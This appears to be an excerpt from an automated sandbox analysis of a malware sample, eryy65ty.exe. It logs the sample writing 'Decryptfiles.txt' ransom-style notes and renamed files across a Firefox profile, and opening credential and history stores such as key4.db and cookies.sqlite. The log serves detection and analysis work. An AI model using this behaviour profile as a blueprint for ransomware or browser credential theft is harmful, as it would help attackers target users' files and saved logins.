Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\archived\2023-10\1696507607957.3d58d1fc-39d5-490d-8dbc-561868c9f39a.first-shutdown.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\archived\2023-10\1696507607957.3d58d1fc-39d5-490d-8dbc-561868c9f39a.first-shutdown.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\archived\2023-10\1696507613291.35dc481e-f598-4332-a743-2bd18ff8343d.health.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\glean\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\archived\2023-10\1696507613314.344809ee-0a17-4796-893a-1909a35962e3.main.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\archived\2023-10\1696507613314.344809ee-0a17-4796-893a-1909a35962e3.main.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\glean\db\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\glean\db\data.safe.bin
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\glean\db\data.safe.bin
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\glean\events\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\glean\pending_pings\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\glean\events\events
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\glean\events\background-update
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\glean\pending_pings\0d62319a-fc25-460c-9412-b5110f492c00
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\glean\pending_pings\35460303-60f8-44e0-8ebe-643bbf246773
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\glean\pending_pings\49695eb7-83b7-45e6-abc4-3adc0ea3ab0f
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\glean\pending_pings\63eea3ec-6088-44da-8f99-8b9ff581461e
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\glean\pending_pings\78e44ecf-ff25-4937-adb1-78c9d7976c09
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\glean\pending_pings\954edb0c-b230-497f-8f90-deac373c5582
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\glean\pending_pings\a5c31d05-ce4d-4ebb-b063-add0be2a28b1
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\glean\tmp\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\glean\pending_pings\a793705e-5d28-4452-9fc0-94e9fe2f2378
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\ExperimentStoreData.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\extension-preferences.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\favicons.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\favicons.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\favicons.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\favicons.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\favicons.sqlite-wal.dOqb
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\handlers.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\minidumps\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\parent.lock.Bect
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\pkcs11.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\places.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\places.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\places.sqlite-wal.NcRo
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\protections.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\protections.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\saved-telemetry-pings\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\saved-telemetry-pings\335f85c0-9448-4635-9bf1-f868e331c1e6
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\saved-telemetry-pings\335f85c0-9448-4635-9bf1-f868e331c1e6
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\saved-telemetry-pings\344809ee-0a17-4796-893a-1909a35962e3
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\saved-telemetry-pings\344809ee-0a17-4796-893a-1909a35962e3
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\saved-telemetry-pings\35dc481e-f598-4332-a743-2bd18ff8343d
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\saved-telemetry-pings\3d58d1fc-39d5-490d-8dbc-561868c9f39a
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\saved-telemetry-pings\3d58d1fc-39d5-490d-8dbc-561868c9f39a
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\saved-telemetry-pings\820a30c5-7f21-4cfe-9fd2-c7b1392e747b
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\saved-telemetry-pings\820a30c5-7f21-4cfe-9fd2-c7b1392e747b
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\saved-telemetry-pings\bc6b0d7e-d6d5-4061-a9ff-337c261da2e4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\saved-telemetry-pings\f172e4e6-9a48-464e-8f64-96feb97a835e
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\saved-telemetry-pings\f172e4e6-9a48-464e-8f64-96feb97a835e
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\saved-telemetry-pings\fc281cef-2f97-4da3-a9b9-9686dbf1ffe3
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\security_state\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\sessionstore-backups\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\sessionstore-backups\previous.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\sessionstore-backups\upgrade.jsonlz4-20230927232528
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\shield-preference-experiments.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\sessionstore.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\SiteSecurityServiceState.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\.metadata-v2
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\ls-archive.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\ls-archive.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-wal.geIA
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-wal.XlOm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-wal.LiWM
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-wal.IaYV
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-wal.feyi
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\to-be-removed\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-wal.yAlE
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\times.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\webappsstore.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\webappsstore.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\webappsstore.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\webappsstore.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\webappsstore.sqlite-wal.HTtW
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\xulstore.json.RpbD
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ov4x28i2.default\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ov4x28i2.default\times.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Stealing of Sensitive Information

barindex
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\addons.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\permissions.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\content-prefs.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\saved-telemetry-pings\35dc481e-f598-4332-a743-2bd18ff8343d
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\ExperimentStoreData.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\saved-telemetry-pings\f172e4e6-9a48-464e-8f64-96feb97a835e
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\saved-telemetry-pings\3d58d1fc-39d5-490d-8dbc-561868c9f39a
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\glean\events\background-update
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\glean\events\events
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\favicons.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\compatibility.ini
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\cookies.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\favicons.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\webappsstore.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\extension-preferences.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\archived\2023-10\1696507607957.3d58d1fc-39d5-490d-8dbc-561868c9f39a.first-shutdown.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\addonStartup.json.lz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\glean\pending_pings\78e44ecf-ff25-4937-adb1-78c9d7976c09
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\parent.lock
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\places.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\saved-telemetry-pings\fc281cef-2f97-4da3-a9b9-9686dbf1ffe3
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\.metadata-v2
